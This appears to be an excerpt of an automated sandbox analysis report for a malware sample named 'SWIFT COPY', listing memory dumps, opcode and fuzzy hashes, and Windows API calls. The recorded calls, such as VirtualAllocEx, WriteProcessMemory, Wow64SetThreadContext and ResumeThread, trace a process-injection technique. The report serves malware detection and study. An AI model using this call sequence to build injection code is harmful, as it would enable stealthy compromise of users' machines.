                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: -2m
                                                                                              • API String ID: 0-2686427999
                                                                                              • Opcode ID: 14e2a371c6ec69a3a733524f786469b00586673037ec1cf8f10bd43a1a2a5c8d
                                                                                              • Instruction ID: a7a1da6fa1bdabb149c1678e4343a5601959a56a6d1548b04f68f330bc5bd10e
                                                                                              • Opcode Fuzzy Hash: 14e2a371c6ec69a3a733524f786469b00586673037ec1cf8f10bd43a1a2a5c8d
                                                                                              • Instruction Fuzzy Hash: 39510BB4E052198FCB08CF9AC9405AEFBF2FF89341F24E56AD41AA7254D7349941CBA4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 93bc51d067990b5b908c14ab85d23406dee632b2f8907a2277e1a0a6bb26e89d
                                                                                              • Instruction ID: da61d610ce171d6a8610eb23d64310a1ed3137191e082be4c30f1aa0b44a9350
                                                                                              • Opcode Fuzzy Hash: 93bc51d067990b5b908c14ab85d23406dee632b2f8907a2277e1a0a6bb26e89d
                                                                                              • Instruction Fuzzy Hash: 51B14277A10302CFD309CF69C4C58D9BBA1FB52301B5B88A6E5868B650D735FA478BD1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c6f5a8ca2a7312a9c973ddc1a5e445a2c16144e120ef4c5b34a99921b0591640

                                                                                              APIs
                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09B73F2E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID:
                                                                                              • API String ID: 963392458-0

                                                                                              APIs
                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09B73F2E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID:
                                                                                              • API String ID: 963392458-0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule
                                                                                              • String ID:
                                                                                              • API String ID: 4139908857-0
                                                                                              APIs
                                                                                              • CreateActCtxA.KERNEL32(?), ref: 04FB8E51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Create
                                                                                              • String ID:
                                                                                              • API String ID: 2289755597-0
                                                                                              APIs
                                                                                              • CreateActCtxA.KERNEL32(?), ref: 04FB8E51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Create
                                                                                              • String ID:
                                                                                              • API String ID: 2289755597-0
                                                                                              APIs
                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 09B736C8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3559483778-0
                                                                                              APIs
                                                                                              • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,09D4BD3D,?,?), ref: 09D4BDEF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893516515.0000000009D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9d40000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: DrawText
                                                                                              • String ID:
                                                                                              • API String ID: 2175133113-0
                                                                                              APIs
                                                                                              • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,09D4BD3D,?,?), ref: 09D4BDEF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893516515.0000000009D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9d40000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: DrawText
                                                                                              • String ID:
                                                                                              • API String ID: 2175133113-0
                                                                                              APIs
                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 09B736C8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3559483778-0
                                                                                              APIs
                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 09B730E6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ContextThreadWow64
                                                                                              • String ID:
                                                                                              • API String ID: 983334009-0
                                                                                              APIs
                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 09B730E6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ContextThreadWow64
                                                                                              • String ID:
                                                                                              • API String ID: 983334009-0
                                                                                              APIs
                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09B737A8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessRead
                                                                                              • String ID:
                                                                                              • API String ID: 1726664587-0
                                                                                              APIs
                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09B737A8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessRead
                                                                                              • String ID:
                                                                                              • API String ID: 1726664587-0
                                                                                              APIs
                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 099A7C03
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ProtectVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 544645111-0
                                                                                              APIs
                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09B735E6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              APIs
                                                                                              • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,09D4CA6A,?,?,?,?,?), ref: 09D4CF17
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893516515.0000000009D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9d40000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFromIconResource
                                                                                              • String ID:
                                                                                              • API String ID: 3668623891-0
                                                                                              APIs
                                                                                              • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,09D4CA6A,?,?,?,?,?), ref: 09D4CF17
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893516515.0000000009D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9d40000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFromIconResource
                                                                                              • String ID:
                                                                                              • API String ID: 3668623891-0
                                                                                              APIs
                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 099A7C03
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ProtectVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 544645111-0
                                                                                              APIs
                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09B735E6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ResumeThread
                                                                                              • String ID:
                                                                                              • API String ID: 947044025-0
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,04FBE32C), ref: 04FBE566
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule
                                                                                              • String ID:
                                                                                              • API String ID: 4139908857-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ResumeThread
                                                                                              • String ID:
                                                                                              • API String ID: 947044025-0
                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 09B761BD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost
                                                                                              • String ID:
                                                                                              • API String ID: 410705778-0
                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 09B761BD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost
                                                                                              • String ID:
                                                                                              • API String ID: 410705778-0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: {#L
                                                                                              • API String ID: 0-1361971085
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: {#L
                                                                                              • API String ID: 0-1361971085
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: l|
                                                                                              • API String ID: 0-1955549514
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 98R
                                                                                              • API String ID: 0-576591972
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ab59602fe188e78c4696c0be1b4485f1a908f5e3133fb1799f3509a7ca7267e7
                                                                                              • Instruction ID: 3b407aa1be59134def03c9f0bdb0263cd6c6e6edbc08c30361a0dfe897a2b1ca
                                                                                              • Opcode Fuzzy Hash: ab59602fe188e78c4696c0be1b4485f1a908f5e3133fb1799f3509a7ca7267e7
                                                                                              • Instruction Fuzzy Hash: 3D810974E041698FCB14CF69C580AAEFBB6FF89344F24D5A9D418A7215D730AE42CFA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0c7a5f45033f151bc72ae57a514f07d35ecdd417180afe6042b55aa871985169
                                                                                              • Instruction ID: 06af759d76da2695950106006e7a4d3b7a1ecffee8a60e213f447a29ff92313f
                                                                                              • Opcode Fuzzy Hash: 0c7a5f45033f151bc72ae57a514f07d35ecdd417180afe6042b55aa871985169
                                                                                              • Instruction Fuzzy Hash: C5810C74E142698FCB14CF69C580AAEFBB3FF89340F24C1A9D418A7215D730AA41CFA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6148497b3795eb53341186fda159bd8fd7414ee44a373c589552ca8d80b4bd97
                                                                                              • Instruction ID: 5065445539de15acb849ee1e9a4a8a85621bc25a4ee0b75a7bf72e3a370c066b
                                                                                              • Opcode Fuzzy Hash: 6148497b3795eb53341186fda159bd8fd7414ee44a373c589552ca8d80b4bd97
                                                                                              • Instruction Fuzzy Hash: 0371F774E15619CFCB04CFA9C5805EEFBF2FF89350F25942AE419B7214D3349A418BA9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 60d4d780f19401a9b3188af157c9e320c972e2165785229ba05546046f406ef1
                                                                                              • Instruction ID: 47d950a935e4e00450e99b0710af8fd42a312d9aa0dcce5bfe8d8439a9df8293
                                                                                              • Opcode Fuzzy Hash: 60d4d780f19401a9b3188af157c9e320c972e2165785229ba05546046f406ef1
                                                                                              • Instruction Fuzzy Hash: C6710874E156198FCB04CFA9C5805EEFBF2EF89350F25942AE409B7254D3349E428BA9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 69a5f9ae497b511f99d024b061adc151257d9536e66ac7bdb64c2121ec24ef16
                                                                                              • Instruction ID: 60a06af3492a359b5228080379993d3e51c0dff0d93f7388381eee789557fd8b
                                                                                              • Opcode Fuzzy Hash: 69a5f9ae497b511f99d024b061adc151257d9536e66ac7bdb64c2121ec24ef16
                                                                                              • Instruction Fuzzy Hash: 13414573B581268BD7058EAECC811EBBB66E796204F0585A7E988DB245D230FE4747C1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 98943c2eb4d3357bf9ea4bc98a339cf18519bcca8e6418195cba43a4eeafe832
                                                                                              • Instruction ID: 8196487e47a058e40eaf3e7b7dfbdc3c26084dec23f1398752128a675b6ef1df
                                                                                              • Opcode Fuzzy Hash: 98943c2eb4d3357bf9ea4bc98a339cf18519bcca8e6418195cba43a4eeafe832
                                                                                              • Instruction Fuzzy Hash: BF510974E042199FCB14CFA9C5815AEFBF2FF89310F24C2AAD418A7215D734A942CFA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ba537d57e0f0093e29240fc0e04ef79301fda9eb65c721c69c3e68735c58838f
                                                                                              • Instruction ID: 86387a34e6a2dfaca4f001a15794d5e0602a740fe25b7466bbfb5dde081d908e
                                                                                              • Opcode Fuzzy Hash: ba537d57e0f0093e29240fc0e04ef79301fda9eb65c721c69c3e68735c58838f
                                                                                              • Instruction Fuzzy Hash: 77511774E042198FCB14CFA9C5815AEFBF2FF89310F24C2A9D458A7215D735A942CF61
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 735d3f33e7d5664e45aae44911a1df9aee8a3db193affec53ef9999ccb80faff
                                                                                              • Instruction ID: f469e8d22139d4d201343d243467a43f5d8f837de1339e37a3e9b8b9bb2e57ed
                                                                                              • Opcode Fuzzy Hash: 735d3f33e7d5664e45aae44911a1df9aee8a3db193affec53ef9999ccb80faff
                                                                                              • Instruction Fuzzy Hash: FB512974E002198FDB14CFA9D9815AEFBF2FF89310F24C269D418A7215D734A942CF60
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 42c36a01b58be401f83978b62438b5bf51756ceccdbf1520ef81ea580ad4943d
                                                                                              • Instruction ID: 3562b0b6681b03e2c2282b4906d92fa6e1153e7a1f752545f1d50eb0b52a9a0e
                                                                                              • Opcode Fuzzy Hash: 42c36a01b58be401f83978b62438b5bf51756ceccdbf1520ef81ea580ad4943d
                                                                                              • Instruction Fuzzy Hash: 03414B327142058FC718CF2AD589996B7F6FB8A350B15C86BD056CB650E674F982CB41
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9cf5cc95a1c7073b8e3cb74b2bf9fd273bfd4cf56737f8ced221dd2dccac29b1
                                                                                              • Instruction ID: 9739ef7f8b91538c14f26c7efee06b7c841a3b98ff0c1c92fe7ab978ab966c53
                                                                                              • Opcode Fuzzy Hash: 9cf5cc95a1c7073b8e3cb74b2bf9fd273bfd4cf56737f8ced221dd2dccac29b1
                                                                                              • Instruction Fuzzy Hash: 40413B32714206CFC718CF2AD489997B7E6FF89210B15C86BD05ADB654E774F942CB41
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bf219982aae16a9bc2a2f954551c888d038d6fe81e4ce80cc8fb107588e8fca4
                                                                                              • Instruction ID: 2c966e6ce5be90ff8cf373bf175f70cf9fe7bf38934323d6015cec089e1099a6
                                                                                              • Opcode Fuzzy Hash: bf219982aae16a9bc2a2f954551c888d038d6fe81e4ce80cc8fb107588e8fca4
                                                                                              • Instruction Fuzzy Hash: EF4123B2B14116CBCB04CF5ACAA06EAF762FB96390B258527D452DB600D330FE16CBD1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bf5408905e2ec8b532a8797fe93fb36ddd053b67c3537be27d9bb6dcf711659d
                                                                                              • Instruction ID: ba5a83d458111789dea46a4957e28deb1d53c33097966dcdf33568ebe09e3749
                                                                                              • Opcode Fuzzy Hash: bf5408905e2ec8b532a8797fe93fb36ddd053b67c3537be27d9bb6dcf711659d
                                                                                              • Instruction Fuzzy Hash: 87412CB0E0A60ADFCB44CFA6D5416AEFBF2EF88340F20986AC415B7254E77497418B95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d6d6270f380ebb061cd830da04757308ba3d7360baeec3963f450bd6da76a289
                                                                                              • Instruction ID: d7229f5d85d9e4b23cde7ed2c1ed67cb2605c9d9fee6f0113c3efffbd4c1c4c3
                                                                                              • Opcode Fuzzy Hash: d6d6270f380ebb061cd830da04757308ba3d7360baeec3963f450bd6da76a289
                                                                                              • Instruction Fuzzy Hash: 0B41F7B0E0520ADFCB04CFAAC5815AEFBF2EF88340F24D56AD815F7215D7349A418BA5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ae1c878b3acbb580258fe87007f56fea66663ef1109fa3e981815fd2e5c4560b
                                                                                              • Instruction ID: b74ebd3318cb4be1d8d4b49649d15e79c4c03e58b605e35771ec946af73c76a8
                                                                                              • Opcode Fuzzy Hash: ae1c878b3acbb580258fe87007f56fea66663ef1109fa3e981815fd2e5c4560b
                                                                                              • Instruction Fuzzy Hash: CF41D4B6F941168FCB44CE9AC4855EEFBB5EB46300B60806B9C45EB350D270E902CBD2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
